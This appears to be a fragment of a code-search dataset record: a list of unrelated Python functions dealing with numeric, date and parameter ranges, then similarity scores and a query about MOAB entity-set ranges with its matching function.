pp[\"type\"] == \"windturbine\":\n vals = [0, pp[\"pmin\"]]\n for i in range(pp[\"pmin\"], pp[\"pmax\"] - pp[\"pmin\"] + 1):\n vals.append(pp[\"pmin\"] + i)\n\n else: # Turbojet\n vals = [0]\n for i in range(pp[\"pmin\"], pp[\"pmax\"] - pp[\"pmin\"]):\n vals.append(pp[\"pmin\"] + i)\n return vals", "def get_dict_from_range(self, start=None, end=None):\n df = self.from_range(self.data, self.factor, start, end, self.lowpass)\n new_source_data = df.to_dict(orient=\"list\")\n new_source_data[\"index\"] = df.index\n for k in list(new_source_data):\n if isinstance(k, tuple):\n new_source_data[\"_\".join(k)] = new_source_data.pop(k)\n\n return new_source_data", "def new_ranges(rs):\n return tuple(chain(*[new_range(r) for r in rs]))", "def parse_ranges(ranges, expand=True):\n pairs = ranges.split(' ')\n content = {}\n for key, value in [pair.split('=') for pair in pairs if '=' in pair]:\n content[key] = parse_range_once(value, expand)\n return content", "def range_temp(start,end):\n year, month, date = map(int, start.split('-'))\n date_start = dt.date(year,month,day)\n year2, month2, date2 = map(int, end.split('-'))\n date_end = dt.date(year2,month2,day2)\n # Query for tobs for definied date range\n results = session.query(func.min(Measurement.tobs),func.max(Measurement.tobs).\\\n func.avg(Measurement.tobs)).filter(Measurement.date >= date_start).filter(Measurement.date <= date_end).all()\n data = list(np.ravel(results))\n return jsonify(data)", "def range_to_m(self, data):\n return data * self._total_range + self._min_range_m", "def parse_range(option):\n return {\"range\": timedelta(days=option)}", "def range_parameter_to_dict(parameter: RangeParameter) -> Dict[str, Any]:\n return {\n \"__type\": parameter.__class__.__name__,\n \"name\": parameter.name,\n \"parameter_type\": parameter.parameter_type,\n \"lower\": parameter.lower,\n \"upper\": parameter.upper,\n \"log_scale\": parameter.log_scale,\n \"logit_scale\": parameter.logit_scale,\n \"digits\": parameter.digits,\n \"is_fidelity\": parameter.is_fidelity,\n \"target_value\": parameter.target_value,\n }", "def _autobounds(self):\n bounds = {}\n\n def check(prop, compare, extreme, val):\n opp = min if compare is max else max\n bounds.setdefault(prop, val)\n bounds[prop] = opp(compare(bounds[prop], val), extreme)\n\n def bound_check(lat_lon):\n lat, lon = lat_lon\n check('max_lat', max, 90, lat)\n check('min_lat', min, -90, lat)\n check('max_lon', max, 180, lon)\n check('min_lon', min, -180, lon)\n\n lat_lons = [lat_lon for feature in self._features.values() for\n lat_lon in feature.lat_lons]\n if not lat_lons:\n lat_lons.append(self._default_lat_lon)\n for lat_lon in lat_lons:\n bound_check(lat_lon)\n\n return bounds", "def startEnd(start, end):\n # * Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.\n # * When given the start and the end date, calculate the `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date inclusive.\n session = Session(engine)\n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date>=start, Measurement.date<=end).all()\n session.close()\n s_e_descriptors = list(np.ravel(results))\n \n return jsonify(s_e_descriptors)", "def calculate_ranges(period, availability, service_recipe, resources):\n\n ranges = []\n\n period_start_dt, period_end_dt = period\n\n delta_duration = get_service_duration(service_recipe)\n delta_step = 
get_service_step(service_recipe)\n\n loop_dt_range = by_timedelta_range((timedelta(0), delta_duration),\n period_start_dt)\n\n while contains(period, loop_dt_range):\n\n if not is_datetime_range_available(loop_dt_range, availability):\n near_working_dt_range = nearest_working_datetime_range(\n loop_dt_range, availability)\n\n if near_working_dt_range is not None:\n loop_dt_range = by_timedelta_range(\n (timedelta(0), delta_duration), near_working_dt_range[0])\n else:\n loop_dt_range = by_timedelta_range(\n (timedelta(0), delta_duration),\n start_of_tomorrow(loop_dt_range[0]))\n\n continue\n\n resource_occupations = get_resource_occupations_in_dt_range(\n loop_dt_range, service_recipe, resources)\n if resource_occupations:\n ranges.append((loop_dt_range, resource_occupations))\n\n # like i++ but more cool\n loop_dt_range = by_timedelta_range(\n (delta_step, delta_step + delta_duration), loop_dt_range[0])\n\n return ranges", "def attributes(self):\n attrs_ = super(NumericAttributeSchema, self).attributes()\n attrs_.append(\"range\")\n return attrs_", "def byrange(self, start, stop):\n\t\treturn ElementsByRange(self.AEM_want, self, (start, stop))", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n # return { \"faq_choice\": self.from_entity(\"faq_choice\"),\"faq_question\": self.from_entity(\"faq_question\"), \"faq_text\": [self.from_text()]}\n\n return {\"faq_choice\": [self.from_entity(\"faq_choice\"), self.from_text()], \"faq_text\": [self.from_text(), self.from_entity(entity=\"navigation\")]}", "def test_resolution_io_min_max_occurs(self):\n cwl = {\n \"cwlVersion\": \"v1.0\",\n \"class\": \"CommandLineTool\",\n \"inputs\": [\n # although types are parsed in multiple ways to compare default/null/array/minOccurs/maxOccurs\n # values, the original definitions here are preserved when there are no complementary WPS details\n {\"id\": \"required_literal\", \"type\": \"string\"},\n {\"id\": \"required_literal_default\", \"type\": \"string\", \"default\": \"test\"},\n {\"id\": \"optional_literal_shortcut\", \"type\": \"string?\"},\n {\"id\": \"optional_literal_explicit\", \"type\": [\"null\", \"string\"]},\n {\"id\": \"required_array_shortcut\", \"type\": \"string[]\"},\n {\"id\": \"required_array_explicit\", \"type\": {\"type\": \"array\", \"items\": \"string\"}},\n {\"id\": \"optional_array_shortcut\", \"type\": \"string[]?\"},\n {\"id\": \"optional_array_explicit\", \"type\": [\"null\", {\"type\": \"array\", \"items\": \"string\"}]},\n # types with complementary WPS details might change slightly depending on combinations encountered\n {\"id\": \"required_literal_min_fixed_by_wps\", \"type\": \"string?\"}, # string? => string (min=1)\n {\"id\": \"optional_literal_min_fixed_by_wps\", \"type\": \"string\"}, # string => string? (min=0)\n {\"id\": \"required_array_min_fixed_by_wps\", \"type\": \"string\"}, # string => string[] (min>1)\n {\"id\": \"required_array_min_optional_fixed_by_wps\", \"type\": \"string?\"}, # string? => string[] (min>1)\n {\"id\": \"required_array_max_fixed_by_wps\", \"type\": \"string\"}, # string => string[] (max>1)\n {\"id\": \"optional_array_max_fixed_by_wps\", \"type\": \"string?\"}, # string? => string[]? (max>1)\n {\"id\": \"optional_array_min_max_fixed_by_wps\", \"type\": \"string\"}, # string => string[]? 
(0..>1)\n ],\n \"outputs\": {\n \"values\": {\"type\": \"float\"}\n }\n }\n body = {\n \"processDescription\": {\n \"process\": {\n \"id\": self._testMethodName,\n \"title\": \"some title\",\n \"abstract\": \"this is a test\",\n \"inputs\": [\n {\"id\": \"required_literal_min_fixed_by_wps\", \"minOccurs\": \"1\"},\n {\"id\": \"optional_literal_min_fixed_by_wps\", \"minOccurs\": \"0\"},\n {\"id\": \"required_array_min_fixed_by_wps\", \"minOccurs\": \"2\"},\n {\"id\": \"required_array_min_optional_fixed_by_wps\", \"minOccurs\": \"2\"},\n {\"id\": \"required_array_max_fixed_by_wps\", \"maxOccurs\": \"10\"},\n {\"id\": \"optional_array_max_fixed_by_wps\", \"minOccurs\": \"0\", \"maxOccurs\": \"10\"},\n {\"id\": \"optional_array_min_max_fixed_by_wps\", \"minOccurs\": \"0\", \"maxOccurs\": \"10\"},\n ]\n }\n },\n \"deploymentProfileName\": \"http://www.opengis.net/profiles/eoc/wpsApplication\",\n \"executionUnit\": [{\"unit\": cwl}],\n }\n desc, pkg = self.deploy_process(body, describe_schema=\"OLD\")\n proc = desc[\"process\"]\n\n assert proc[\"inputs\"][0][\"id\"] == \"required_literal\"\n assert proc[\"inputs\"][0][\"minOccurs\"] == 1\n assert proc[\"inputs\"][0][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][1][\"id\"] == \"required_literal_default\"\n assert proc[\"inputs\"][1][\"minOccurs\"] == 0\n assert proc[\"inputs\"][1][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][2][\"id\"] == \"optional_literal_shortcut\"\n assert proc[\"inputs\"][2][\"minOccurs\"] == 0\n assert proc[\"inputs\"][2][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][3][\"id\"] == \"optional_literal_explicit\"\n assert proc[\"inputs\"][3][\"minOccurs\"] == 0\n assert proc[\"inputs\"][3][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][4][\"id\"] == \"required_array_shortcut\"\n assert proc[\"inputs\"][4][\"minOccurs\"] == 1\n assert proc[\"inputs\"][4][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][5][\"id\"] == \"required_array_explicit\"\n assert proc[\"inputs\"][5][\"minOccurs\"] == 1\n assert proc[\"inputs\"][5][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][6][\"id\"] == \"optional_array_shortcut\"\n assert proc[\"inputs\"][6][\"minOccurs\"] == 0\n assert proc[\"inputs\"][6][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][7][\"id\"] == \"optional_array_explicit\"\n assert proc[\"inputs\"][7][\"minOccurs\"] == 0\n assert proc[\"inputs\"][7][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][8][\"id\"] == \"required_literal_min_fixed_by_wps\"\n assert proc[\"inputs\"][8][\"minOccurs\"] == 1\n assert proc[\"inputs\"][8][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][9][\"id\"] == \"optional_literal_min_fixed_by_wps\"\n assert proc[\"inputs\"][9][\"minOccurs\"] == 0\n assert proc[\"inputs\"][9][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][10][\"id\"] == \"required_array_min_fixed_by_wps\"\n # FIXME: https://github.com/crim-ca/weaver/issues/50\n # `maxOccurs=1` not updated to `maxOccurs=\"unbounded\"` as it is evaluated as a single value,\n # but it should be considered an array since `minOccurs>1`\n # (see: https://github.com/crim-ca/weaver/issues/17)\n assert proc[\"inputs\"][10][\"minOccurs\"] == 2\n # assert proc[\"inputs\"][10][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][11][\"id\"] == \"required_array_min_optional_fixed_by_wps\"\n assert proc[\"inputs\"][11][\"minOccurs\"] == 2\n # assert proc[\"inputs\"][11][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][12][\"id\"] == \"required_array_max_fixed_by_wps\"\n assert proc[\"inputs\"][12][\"minOccurs\"] == 1\n 
assert proc[\"inputs\"][12][\"maxOccurs\"] == 10\n assert proc[\"inputs\"][13][\"id\"] == \"optional_array_max_fixed_by_wps\"\n assert proc[\"inputs\"][13][\"minOccurs\"] == 0\n assert proc[\"inputs\"][13][\"maxOccurs\"] == 10\n\n assert pkg[\"inputs\"][0][\"id\"] == \"required_literal\"\n assert pkg[\"inputs\"][0][\"type\"] == \"string\"\n assert pkg[\"inputs\"][1][\"id\"] == \"required_literal_default\"\n assert pkg[\"inputs\"][1][\"type\"] == \"string\"\n assert pkg[\"inputs\"][1][\"default\"] == \"test\"\n assert pkg[\"inputs\"][2][\"id\"] == \"optional_literal_shortcut\"\n assert pkg[\"inputs\"][2][\"type\"] == \"string?\"\n assert pkg[\"inputs\"][3][\"id\"] == \"optional_literal_explicit\"\n assert pkg[\"inputs\"][3][\"type\"][0] == \"null\"\n assert pkg[\"inputs\"][3][\"type\"][1] == \"string\"\n assert pkg[\"inputs\"][4][\"id\"] == \"required_array_shortcut\"\n assert pkg[\"inputs\"][4][\"type\"] == \"string[]\"\n assert pkg[\"inputs\"][5][\"id\"] == \"required_array_explicit\"\n assert pkg[\"inputs\"][5][\"type\"][\"type\"] == \"array\"\n assert pkg[\"inputs\"][5][\"type\"][\"items\"] == \"string\"\n assert pkg[\"inputs\"][6][\"id\"] == \"optional_array_shortcut\"\n assert pkg[\"inputs\"][6][\"type\"] == \"string[]?\"\n assert pkg[\"inputs\"][7][\"id\"] == \"optional_array_explicit\"\n assert pkg[\"inputs\"][7][\"type\"][0] == \"null\"\n assert pkg[\"inputs\"][7][\"type\"][1][\"type\"] == \"array\"\n assert pkg[\"inputs\"][7][\"type\"][1][\"items\"] == \"string\"\n # FIXME:\n # Although WPS minOccurs/maxOccurs' specifications are applied, they are not back-ported to CWL package\n # definition in order to preserve the same logic. CWL types should be overridden by complementary details.\n # - https://github.com/crim-ca/weaver/issues/17\n # - https://github.com/crim-ca/weaver/issues/50\n assert pkg[\"inputs\"][8][\"id\"] == \"required_literal_min_fixed_by_wps\"\n # assert pkg[\"inputs\"][8][\"type\"] == \"string\"\n assert pkg[\"inputs\"][9][\"id\"] == \"optional_literal_min_fixed_by_wps\"\n # assert pkg[\"inputs\"][9][\"type\"] == \"string?\"\n assert pkg[\"inputs\"][10][\"id\"] == \"required_array_min_fixed_by_wps\"\n # assert pkg[\"inputs\"][10][\"type\"] == \"string[]\"\n assert pkg[\"inputs\"][11][\"id\"] == \"required_array_min_optional_fixed_by_wps\"\n # assert pkg[\"inputs\"][11][\"type\"] == \"string[]?\"\n assert pkg[\"inputs\"][12][\"id\"] == \"required_array_max_fixed_by_wps\"\n # assert pkg[\"inputs\"][12][\"type\"] == \"string[]\"\n assert pkg[\"inputs\"][13][\"id\"] == \"optional_array_max_fixed_by_wps\"\n # assert pkg[\"inputs\"][13][\"type\"] == \"string[]?\"", "def entity(entity):\n for start, end in entity.spans:\n yield start, end-start", "def process_range(id_range):\n try:\n store = {}\n for i, id in enumerate(id_range):\n store[id] = loadProt(id)\n print(f'\\r>>Loading Set: {\"{:.2f}\".format(i+1 / len(id_range) * 100)}%', end='')\n return store\n except:\n traceback.print_exc()\n raise", "def __json__(self, request=None):\n # start = self.start.isoformat() if self.start else None\n # end = self.end.isoformat() if self.end else None\n return dict(\n timeref_type=\"daterange\",\n interval=self.interval,\n start=self.start.isoformat(),\n end=self.end.isoformat(),\n )", "def calculate_statistics(self) -> Dict[str, Tuple[str, float]]:\n tempDict = {\n 'max_start': ('', -1),\n 'max_end': ('', -1),\n 'max_time_low_availability': ('', -1),\n 'max_time_low_unoccupied': ('', -1)\n }\n\n\n\n return {\n 'max_start': ('', -1),\n 'max_end': ('', -1),\n 
'max_time_low_availability': ('', -1),\n 'max_time_low_unoccupied': ('', -1)\n }", "def get_binding_motifs(seq):\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted", "def find_mode_range(self):\n\n if (len(self.models) < 1): return -1,-1,-1,-1\n nmin_total,nmax_total,lmin_total,lmax_total = self.models[0].find_mode_range()\n for model in self.models:\n nmin, nmax, lmin, lmax = model.find_mode_range()\n if (nmin < nmin_total): nmin_total = nmin\n if (nmax > nmax_total): nmax_total = nmax\n if (lmin < lmin_total): lmin_total = lmin\n if (lmax > lmax_total): lmax_total = lmax\n return nmin_total, nmax_total, lmin_total, lmax_total", "def evaluate_mapped_inputs(self,**kwargs):\n result = {}\n for v,t,o,p,n in zip(self.values,self.thresholds,self.operations,self.proportions,self.output_names):\n value = kwargs.get(v)\n if isinstance(t,basestring):\n threshold = kwargs.get(t)\n else:\n threshold = t\n if o == \"lt\":\n result[n] = (value < threshold * p)\n elif o == \"gt\":\n result[n] = (value > threshold * p)\n elif o == \"lte\":\n result[n] = (value <= threshold * p)\n elif o == \"gte\":\n result[n] = (value >= threshold * p)\n return result", "def type_with_ranges(self, tchain, p_elem, rangekw, gen_data):\n ranges = self.get_ranges(tchain, rangekw)\n if not ranges: return p_elem.subnode(gen_data())\n if len(ranges) > 1:\n p_elem = SchemaNode.choice(p_elem)\n p_elem.occur = 2\n for r in ranges:\n d_elem = gen_data()\n for p in self.range_params(r, rangekw):\n d_elem.subnode(p)\n p_elem.subnode(d_elem)", "def get_available_age_brackets_and_mapping():\n brackets_dic = {}\n dict_of_age_by_brackets = {}\n\n for num_agebrackets in [85, 18, 15, 12]:\n brackets = []\n if num_agebrackets == 85:\n for i in range(84):\n brackets.append([i])\n brackets.append(np.arange(84, 101))\n # # num_agebracket = 20 only works if you have an age distribution and\n # # matrices that go in more detail than age 84+, so if you wanted\n # # brackets of 85-89, 90-94, 95-100+, etc. it would be hard unless\n # # you have those matrices (which we don't because of the European\n # # matrices)\n\n # if num_agebrackets == 20:\n # for i in range(19):\n # brackets.append(np.arange(5 * i, 5 * (i + 1)))\n # brackets.append(np.arange(95, 101))\n if num_agebrackets == 18:\n for i in range(16):\n brackets.append(np.arange(5 * i, 5 * (i + 1)))\n brackets.append(np.arange(80, 84))\n brackets.append(np.arange(84, 101))\n if num_agebrackets == 15:\n for i in range(14):\n brackets.append(np.arange(5 * i, 5 * (i + 1)))\n brackets.append(np.arange(70, 101))\n if num_agebrackets == 12:\n for i in range(11):\n brackets.append(np.arange(5 * i, 5 * (i + 1)))\n brackets.append(np.arange(55, 101))\n\n age_by_brackets_dic = dict.fromkeys(np.arange(101), 0)\n for n, b in enumerate(brackets):\n for a in b:\n age_by_brackets_dic[a] = n\n\n brackets_dic[num_agebrackets] = brackets\n dict_of_age_by_brackets[num_agebrackets] = age_by_brackets_dic\n\n return brackets_dic, dict_of_age_by_brackets" ]
[ "0.65154475", "0.600458", "0.5998008", "0.5853334", "0.5807972", "0.5797119", "0.562755", "0.562755", "0.55852807", "0.55669194", "0.5557111", "0.5455386", "0.54513985", "0.5441645", "0.53997433", "0.53997433", "0.5393903", "0.5376995", "0.5375735", "0.53752905", "0.5361025", "0.53542024", "0.53466415", "0.53338194", "0.5326077", "0.53103244", "0.53081155", "0.5306106", "0.5288727", "0.5277856", "0.52645034", "0.52536285", "0.52473694", "0.52369153", "0.52260303", "0.5218554", "0.52129227", "0.51920414", "0.5176977", "0.5166336", "0.5160458", "0.5160458", "0.5160458", "0.5160458", "0.51533514", "0.51525843", "0.5135463", "0.5121645", "0.51174283", "0.5111095", "0.5105106", "0.51005304", "0.5089592", "0.50828683", "0.5082784", "0.5079511", "0.50665575", "0.5060187", "0.50567484", "0.5050537", "0.50223804", "0.50223804", "0.50223804", "0.50223804", "0.5008652", "0.49992755", "0.49914816", "0.49892315", "0.49740088", "0.49507877", "0.4941573", "0.49400443", "0.4936197", "0.4936197", "0.49124435", "0.49112305", "0.49096194", "0.4904893", "0.4903623", "0.48999575", "0.48963922", "0.48957574", "0.48903635", "0.48861217", "0.48852253", "0.48837274", "0.48823866", "0.48791784", "0.48684126", "0.48665616", "0.48614326", "0.48597464", "0.4859302", "0.48540697", "0.48534033", "0.48406684", "0.48403108", "0.48360687", "0.4835407", "0.4831873" ]
0.6155824
1
Get a dictionary with MOAB Ranges that are specific to the types.MBENTITYSET type inputs
def get_entityset_ranges(my_core, meshset, geom_dim): entityset_ranges = {} entityset_types = ['Nodes', 'Curves', 'Surfaces', 'Volumes'] for dimension, set_type in enumerate(entityset_types): entityset_ranges[set_type] = my_core.get_entities_by_type_and_tag(meshset, types.MBENTITYSET, geom_dim, [dimension]) return entityset_ranges
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getRangeMM(self) -> float:\n ...", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def get_native_ranges(my_core, meshset, entity_types):\n\n native_ranges = {}\n for entity_type in entity_types:\n native_ranges[entity_type] = my_core.get_entities_by_type(\n meshset, entity_type)\n return native_ranges", "def getMassRange(brand):\n return mass_range[brand]", "def test_get_meta_range(self):\n pass", "def range_(self):\n return self.bset.range_", "def get_param_ranges(line_model):\n\n line_models = ['voigt', 'rosato', 'stehle', 'stehle_param', ]\n n_upper_range = [(np.nan, np.nan), (3, 7), (3, 30), (3, 9)]\n e_dens_range = [(np.nan, np.nan), (1e19, 1e22), (1e16, 1e25), (0., 1e22)]\n temp_range = [(np.nan, np.nan), (0.32, 32), (0.22, 110), (0., 1000)]\n b_field_range = [(np.nan, np.nan), (0, 5), (0, 5), (0, 5)]\n\n param_ranges = list(zip(line_models, n_upper_range, e_dens_range, temp_range, b_field_range))\n columns = ['line_model_name', 'n_upper_range', 'e_dens_range', 'temp_range', 'b_field_range']\n param_ranges = pd.DataFrame(data=param_ranges, columns=columns)\n\n n_upper_range = param_ranges['n_upper_range'][param_ranges['line_model_name'] == line_model].values[0]\n e_dens_range = param_ranges['e_dens_range'][param_ranges['line_model_name'] == line_model].values[0]\n temp_range = param_ranges['temp_range'][param_ranges['line_model_name'] == line_model].values[0]\n b_field_range = param_ranges['b_field_range'][param_ranges['line_model_name'] == line_model].values[0]\n\n return n_upper_range, e_dens_range, temp_range, b_field_range", "def range_params(self, ran, kw):\n specs = {\"range\": (SchemaNode(\"value\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minInclusive\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxInclusive\")),\n \"length\": (SchemaNode(\"param\").set_attr(\"name\",\"length\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minLength\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxLength\"))}\n (exact, min_, max_) = specs[kw]\n if (len(ran) == 1 or ran[0] == ran[1]) and ran[0][0] != \"m\":\n elem = exact\n elem.text = ran[0]\n return [elem]\n res = []\n if ran[0][0] != \"m\":\n elem = min_\n elem.text = ran[0]\n res.append(elem)\n if ran[1][0] != \"m\":\n elem = max_\n elem.text = ran[1]\n res.append(elem)\n return res", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def get_range_info(self):\n with open(self.range_path, 'r') as _file:\n for line in _file.readlines():\n list0 = line.strip().split('-')\n range_dict = {\n 'min': int(list0[0], 16),\n 'max': int(list0[1], 16),\n 'max_offset': int(list0[1], 16) - int(list0[0], 16),\n }\n self.ranges.append(range_dict)", "def _parse_requantization_ranges(self):\n res = {}\n\n print_suffix = \"__print__\"\n lines = self._get_valid_log()\n temp_min = {}\n temp_max = {}\n pattern_def = r\"{};{}:\\[\\-?\\d+\\.?\\d*e?-?\\+?\\d*\\]\".format(print_suffix, self.postfix)\n for i in lines:\n if not re.search(pattern_def, i):\n continue\n\n max_line_data = i.split(print_suffix + \";\" + self.postfix)[-1]\n min_value = 
max_line_data.split('][')[0].split('[')[1]\n max_value = max_line_data.split('][')[1].split(']')[0]\n name = i.split(';')[1].strip()[:-len(print_suffix)]\n if name not in temp_min:\n temp_min[name] = []\n if name not in temp_max:\n temp_max[name] = []\n\n temp_min[name].append(float(min_value))\n temp_max[name].append(float(max_value))\n\n for key in temp_min:\n target_min_index = int(np.ceil(len(temp_min[key]) * (1 - self.threshold)))\n\n if key not in res:\n res[key] = []\n\n if target_min_index > len(temp_min[key]) - 1:\n target_min_index = len(temp_min[key]) - 1\n res[key].append(sorted(temp_min[key])[target_min_index])\n\n for key in temp_max:\n target_max_index = int(np.floor(len(temp_max[key]) * self.threshold)) - 1\n\n if target_max_index > len(temp_max[key]) - 1:\n target_max_index = len(temp_max[key]) - 1\n\n res[key].append(sorted(temp_max[key])[target_max_index])\n\n if self.tensor_data:\n for k, v in self.tensor_data.items():\n if k in res:\n self.logger.debug(\"Update node {} min to {}, max to {}.\".format(k, v[2], v[3]))\n res[k] = [v[2], v[3]]\n return res", "def get_range(self):\n classes = concrete_descendents(self.class_)\n d=dict([(name,class_) for name,class_ in classes.items()])\n if self.allow_None:\n d['None']=None\n return d", "def _part_group_cell_mapper(bd_type):\n js, iss = np.meshgrid(range(smt.cols), range(smt.rows)) # zero indexed to agree with python interpretation\n idx = bd_type.flatten() != -1\n out = dict(zip(range(1, idx.sum() + 1), list(zip(iss.flatten()[idx], js.flatten()[idx]))))\n return out", "def get_range(self):\n # CEBHACKALERT: was written assuming it would only operate on\n # Parameterized instances. Think this is an sf.net bug/feature\n # request. Temporary fix: don't use obj.name if unavailable.\n try:\n d=dict([(obj.name,obj) for obj in self.objects])\n except AttributeError:\n d=dict([(obj,obj) for obj in self.objects])\n return d", "def get_ranges(graph: Graph, property_to_id: Dict[str, int], entity_type_to_id: Dict[str, int]) -> Dict[int, int]:\n # dictionary pointing from object property id to an entity type id\n ranges = {}\n\n # add all range triples for which the subject is an object property and the object is an entity type\n for subject, predicate, object in graph.triples((None, RDFS.range, None)):\n if subject in property_to_id and object in entity_type_to_id:\n ranges[property_to_id[subject]] = entity_type_to_id[object]\n return ranges", "def get_limits(age_groups):\n\n limits = {}\n for data in age_groups:\n pattern = re.compile(r'([\\d]+)-([\\d]+)')\n match = pattern.search(data)\n age_min = int(match.group(1).strip())\n age_max = int(match.group(2).strip())\n # print(f'limits = {age_min} to {age_max}')\n limits[f'Age_{data}'] = [age_min, age_max]\n return limits", "def get_allowed_ranges(csvfile):\n from csv import DictReader\n ranges = {}\n with open(csvfile, 'r') as infile:\n # Remove spaces from field headers\n firstline = infile.readline()\n headers = [k.strip() for k in firstline.split(',')]\n if not len(headers) == 11:\n headers = [k.strip() for k in firstline.split(' ')]\n opfield = 'CSVv2;OperatingPoint'\n if not opfield in headers: opfield = 'cMVAv2;OperatingPoint'\n if not opfield in headers: opfield = 'CSV;OperatingPoint'\n\n reader = DictReader(infile, fieldnames=headers)\n for row in reader:\n key = (int(row[opfield].strip()),\n row['measurementType'].strip(),\n row['sysType'].strip(),\n int(row['jetFlavor'].strip()))\n ranges.setdefault(key, {})\n for var in ['eta', 'pt', 'discr']:\n mini = 
float(row['%sMin'%var].strip())\n maxi = float(row['%sMax'%var].strip())\n ranges[key]['%sMin'%var] = min(ranges[key].setdefault('%sMin'%var, mini), mini)\n ranges[key]['%sMax'%var] = max(ranges[key].setdefault('%sMax'%var, maxi), maxi)\n return ranges", "def map_range( self, rng ):\n rmap = {\n '2 nA': pac.Ammeter.CurrentRange.N2,\n '20 nA': pac.Ammeter.CurrentRange.N20,\n '200 nA': pac.Ammeter.CurrentRange.N200,\n '2 uA': pac.Ammeter.CurrentRange.U2,\n '20 uA': pac.Ammeter.CurrentRange.U20,\n '200 uA': pac.Ammeter.CurrentRange.U200,\n '2 mA': pac.Ammeter.CurrentRange.M2,\n '20 mA': pac.Ammeter.CurrentRange.M20\n }\n \n if rng in rmap:\n return rmap[ rng ]\n \n else:\n raise ValueError( 'Invalid range' )", "def setup_bins(self):\n width = int((self.max - self.min) / self.bin_size)\n bins = {\n i * width + self.min: (idx, idx + self.bin_size)\n for i, idx in enumerate(range(0, len(self.nums), self.bin_size))\n }\n return bins", "def ranges(self):\n return self._ranges", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def mass_combinations(mH_min, mH_max, mH_step_size, mB_min, mB_max, mB_step_size):\n\n higgsino_masses = np.arange(mH_min, mH_max, mH_step_size)\n bino_masses = np.arange(mB_min, mB_max, mB_step_size)\n\n tuples = list(it.product(higgsino_masses, bino_masses))\n namedtuples = [MassCombination(*_tuple) for _tuple in tuples]\n return filter(lambda x: x.mH > x.mB + 126., namedtuples)", "def getSets():", "def range_table(self):\n range_table_base = []\n if self.block_mask != None:\n range_table_length = len(self.block_mask)\n else:\n range_table_length = self.block_num\n\n for i in range(range_table_length):\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.k_size))\n range_table_base.append(len(self.pool_type))\n\n return range_table_base", "def getRange(self, chr, start, end, bins=2000, zoomlvl=-1, metric=\"AVG\", respType=\"DataFrame\"):\n try:\n iter = self.file.fetch(chr, start, end)\n # result = []\n # for x in iter:\n # returnBin = (x.reference_name, x.reference_start, x.reference_end, x.query_alignment_sequence, x.query_sequence)\n # result.append(returnBin)\n\n # if self.columns is None:\n # self.columns = [\"chr\", \"start\", \"end\", \"query_alignment_sequence\", \"query_sequence\"]\n\n # if respType is \"DataFrame\":\n # result = toDataFrame(result, self.columns)\n\n (result, _) = get_range_helper(self.toDF, self.get_bin,\n self.get_col_names, chr, start, end, iter, self.columns, respType)\n\n return result, None\n except ValueError as e:\n raise Exception(\"didn't find chromId with the given name\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> 
